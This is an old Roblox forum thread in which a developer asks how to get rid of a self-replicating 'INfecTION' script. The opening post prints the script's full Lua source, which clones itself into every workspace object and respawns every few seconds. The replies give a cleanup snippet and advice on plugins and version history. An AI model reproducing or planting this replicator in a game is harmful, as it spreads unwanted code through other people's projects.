of     1   

EmporerSuperNova
#132494956Friday, May 02, 2014 11:26 PM GMT

Hi, I keep on getting this on every place. it is a rotate, but when I delete it, guess what happened: It reappers. I even took a plugin AND a script to fix it. Or free model. Anyways, theres a script named: Script......Or is it... And some is spelled like: INfecTION Or spelled infection heres what the script is: if script.Parent.className ~= "RotateP" then local p = Instance.new("RotateP") p.Parent = workspace p.Name = "INfecTION" script.Parent = p end function check() local list = workspace:GetChildren() for i = 1, #list do if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then script.Parent:Clone().Parent = list[i] end wait() end end while true do check() if workspace:findFirstChild("inFECtion") == nil then local main = script.Parent:Clone() main.Name = "inFECtion" main.Parent = workspace end wait(3) end Its just multiplying, right? Or is there a hidden script behind this. Oh, and I heard that it might be this plugin: http://web.roblox.com/Roblox-Best-Infection-Scanner-Even-Better-item?id=142269379 Im currently uninstalling it. THANKS FOR READING! And please get help ASAP Or if you know how to fix, PLEASE TELL ASAP!
EmporerSuperNova
#132495317Friday, May 02, 2014 11:30 PM GMT

Oh, I forgot, I didn't use Free models
EmporerSuperNova
#132497326Friday, May 02, 2014 11:51 PM GMT

bump HELP!
thejunk101
#132505015Saturday, May 03, 2014 1:20 AM GMT

If the part is deleted, it will clone itself. Nil= not existed. I suggest taking out the script. "Do you even grammar"
CryptDev
#132505180Saturday, May 03, 2014 1:22 AM GMT

Actully, the same thing is happening with my admin script. I have no idea... Do u even egg?
EmporerSuperNova
#132574556Saturday, May 03, 2014 3:21 PM GMT

I deleted it, then it pops up.
SilenceCore
#132581530Saturday, May 03, 2014 4:29 PM GMT

Vritix
#132582620Saturday, May 03, 2014 4:44 PM GMT

Put this into the command bar under your studio screen : GetAll = function(ObjectTable) local All = {} ScanItem = function(Table, Item) for Index, Object in pairs (Item:GetChildren()) do table.insert(Table, Object) ScanItem(All, Object) end end for Index, Object in pairs (ObjectTable) do table.insert(All, Object) ScanItem(All, Object) end return All end local Q = {} for _, a in pairs (GetAll(Game:GetChildren())) do if a:IsA("RotateP") then table.insert(Q, a) end end for _, v in pairs (Q) do pcall(function() for _, j in pairs (v:GetChildren()) do pcall(function() j.Disabled = true j.Source = "" end) end v:Destroy() end) end
EmporerSuperNova
#132631205Sunday, May 04, 2014 12:36 AM GMT

Thanks!
InternalSequence
#132639614Sunday, May 04, 2014 2:02 AM GMT

Chaddaking
#192482504Friday, July 01, 2016 3:41 AM GMT

Delete the script I called Pizza Hut and asked for the numbers to Domino's.
master3395
#199034604Saturday, September 24, 2016 2:50 PM GMT

Hello, i got a report from someone else, that says my plugin does something. But there's nothing wrong in my scripts. My plugin does remove infections, and should remove the one your listing in here. If it doesn't you need to check if your plugins are updated. This is how you check it. 1. Open studio. 2. Hit "Plugins". 3. Then hit "Manage Plugins" 4. Then hit "update" on the right side, over the active plugins. Got any future questions. Just Pm me.
MuminoviCA1
#223630822Monday, August 14, 2017 1:01 AM GMT

Help me i have that rn ://// can someone tell me name of that model i got really confused and i don't know how to delete it like..
CorpROBLOX
#223630948Monday, August 14, 2017 1:04 AM GMT

It is an infected script. You should insert a vaccine script or revert to an older version of your game (You can do that in Configure This Game>Version History. Problem should be solved!
gh0stbit
#223631393Monday, August 14, 2017 1:14 AM GMT

just dont be a noob and this wont happen

    of     1